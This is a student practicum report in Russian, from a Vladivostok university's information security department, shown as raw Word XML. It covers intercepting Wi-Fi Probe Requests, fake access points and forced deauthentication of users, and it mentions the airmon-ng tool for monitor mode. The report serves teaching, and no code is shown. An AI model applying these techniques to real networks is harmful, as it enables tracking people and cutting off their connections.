                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000034C">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000361">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">г. Владивосток</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000376">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000038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rd60k5cnyx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практику</w:t>
              <w:tab/>
              <w:t xml:space="preserve">6</w:t>
            </w:r>
          </w:hyperlink>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7</w:t>
            </w:r>
          </w:hyperlink>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Теоретическая часть</w:t>
              <w:tab/>
              <w:t xml:space="preserve">8</w:t>
            </w:r>
          </w:hyperlink>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Практическая часть</w:t>
              <w:tab/>
              <w:t xml:space="preserve">10</w:t>
            </w:r>
          </w:hyperlink>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Осуществление деаунтификации пользователей</w:t>
              <w:tab/>
              <w:t xml:space="preserve">13</w:t>
            </w:r>
          </w:hyperlink>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19</w:t>
            </w:r>
          </w:hyperlink>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w:t>
              <w:tab/>
              <w:t xml:space="preserve">22</w:t>
            </w:r>
          </w:hyperlink>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2</w:t>
              <w:tab/>
              <w:t xml:space="preserve">27</w:t>
            </w:r>
          </w:hyperlink>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28</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000039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9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97">
      <w:pPr>
        <w:ind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Характеристика</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000398">
      <w:pPr>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9">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Выдана студенту 4 курса, специальности «Компьютерная безопасность», специализации «Математические методы защиты информации», Сысоеву Алексею Андреевичу.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000039A">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Сысоев Алексей Андреевич в период с 22.02.2021 по 26.06.2021 года, проходил учебную практику (учебно-лабораторный практикум) на кафедре информационной безопасности ШЕН ДВФУ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000039B">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время прохождения практики Алексей проявил усердие, тягу к знаниям, огромное желание и трудолюбие, а также неподдельный интерес к изучению материала, требуемого для написания отчета. Приходил на консультацию вовремя с перечнем вопросов, с подробным и исчерпывающим описанием о текущем состоянии практики, со списком отмеченных задач. Внимательно изучал предложенные материалы и литературу на интересующую тематику.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000039C">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Сысоев А.А. полностью выполнил предусмотренную программу практики, продемонстрировал умения самостоятельно решать практические вопросы, применяя теоретическую базу, полученную в учебный период, а также при самостоятельном обучении.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000039D">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поставленных задач Сысоев А.А. характеризуется инициативностью, сообразительностью и ответственностью.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000039E">
      <w:pPr>
        <w:spacing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0">
      <w:pPr>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 кафедры                                       </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003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информационной безопасности</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">_________    Зотов С.С.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003A3">
      <w:pPr>
        <w:ind w:firstLine="56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3A4">
      <w:pPr>
        <w:ind w:firstLine="567"/>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5">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ДНЕВНИК СТУДЕНТА</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003A7">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:smallCaps w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2"/>
        <w:tblW w:w="10231.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1928"/>
        <w:gridCol w:w="4900"/>
        <w:gridCol w:w="2161"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1242"/>
            <w:gridCol w:w="1928"/>
            <w:gridCol w:w="4900"/>
            <w:gridCol w:w="2161"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="587" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003A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tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003A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Рабочее место</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003A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Краткое содержание выполняемых работ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003A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Отметки руководителя</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="598" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003A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22.02.21 – 15.03.21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003A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КИБ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003AE">
            <w:pPr>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Подготовка оборудования для работы </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003AF">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="598" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003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16.03.21 – 27.04.21</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003B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КИБ</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003B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теоретического материала</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003B4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="587" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003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28.04.21 – 24.05.21</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003B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КИБ</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003B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программного обеспечения </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003B9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="598" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003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25.05.21 – 14.06.21</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003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КИБ</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003B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программного обеспечения </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="587" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003B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15.06.21 – 26.06.21</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003BF">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КИБ</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003C2">
            <w:pPr>
              <w:jc w:val="cente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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Написание отчёта по проделанной работе</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003C3">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_______________________________________ Сысоев А.А.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003C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подпись Ф.И.О.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003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практики от ДВФУ _________________Зотов С.С.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003C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подпись Ф.И.О.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003CD">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E">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F">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pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.6yni3ostti4x" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003D1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.rd60k5cnyxl" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Задание на практику</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003D2">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Изучение основ беспроводной передачи данных, используемых в современном оборудовании и вычислительной техники;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003D3">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Приобретение практических навыков в настройке оборудования, необходимого для сбора и последующей обработки полученных данных при перехвате Wi-Fi Probe Request запросов;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003D4">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Реализация программного обеспечения, позволяющего управлять режимами работы сетевого адаптера устройства для переключения между режимами прослушивания, ложной точки доступа и принудительного отключения пользователя от сети;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003D5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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Написание отчета о проделанной работе по вышеуказанной теме.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003D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D7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.30j0zll" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Введение</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003D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Учебная (по получению первичных профессиональных умений и навыков, в том числе первичных умений и навыков научно-исследовательской деятельности) практика проходила на кафедре информационной безопасности ШЕН ДВФУ в период с 22 февраля 2021 года по 26 июня 2021 года.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003D9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Целью прохождения практики является </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">приобретение практических и теоретических навыков по специальности, а также навыков оформления проведенного исследования в отчетной форме.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003D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практики:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Ознакомиться с теоретическими основами беспроводной передачи данных посредством Wi-Fi-сетей;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003DC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Приобрести и настроить для дальнейшей работы микрокомпьютер Raspberry Pi 3;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003DD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Изучить и реализовать программу по управлению технологией перехвата Probe Request запросов и провести анализ перехваченных данных;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003DE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Изучить и реализовать программу по управлению технологией создания ложной Wi-Fi точки доступа;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003DF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Изучить и реализовать программу по управлению технологией отключения конечного пользователя от Wi-Fi точки доступа;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003E0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Написать отчет о проделанной работе.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003E1">
      <w:pPr>
        <w:spacing w:after="16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E2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.1fob9te" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Теоретическая часть</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003E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Эволюция беспроводных соединений и последующее повсеместное распространение Wi-Fi инфраструктуры обеспечили возможность, анализируя соединение между клиентом и точкой доступа, получать различную информацию о человеке. Это может быть его местоположение, схема передвижений, информация о других активностях.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003E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стандарту IEEE 802.11 мобильные устройства могут работать в двух режимах при подключении к сети: в режиме пассивного сканирования и в режиме активного сканирования. Если устройство находится в пассивном режиме, оно прослушивает маячковые сообщения (beacon frames), которые рассылаются точками доступа по определённым каналам, таким образом, предлагая клиентам подключиться к этим точкам. Сканирование происходит полностью в пассивном режиме, из-за чего может потратиться много времени для того, чтобы просканировать все каналы на частоте 2.4 ГГц (примерно 1150 мс). При активном же сканировании мобильные устройства продолжительное время рассылают пакеты, называемые Probe Request запросы, и таким образом происходит поиск сетей, к которым устройство было когда-то подключено, чтобы автоматически переподключиться к ним. Для сканирования одного канала в среднем необходимо 8 мс, что намного быстрее чем, если бы устройство находилось в режиме пассивного сканирования. Probe Request запросы содержат уникальные MAC-адреса устройств и имя сети, поиск которой ведётся в данный момент.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003E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Незашифрованные Probe Request запросы можно перехватить с помощью недорогих устройств, либо программ, называющихся Wi-Fi снифферами. К примеру, для их перехвата можно использовать микрокомпьютер Raspberry Pi с установленной на него системой Linux. Для этого необходимо перевести сетевой адаптер в режим мониторинга, который позволяет адаптеру не ассоциировать себя с какой-либо сетью и принимать все видимые ему пакеты. Для перевода в данный режим есть различные способы, но самым популярным является использование утилиты </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">airmon-ng</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
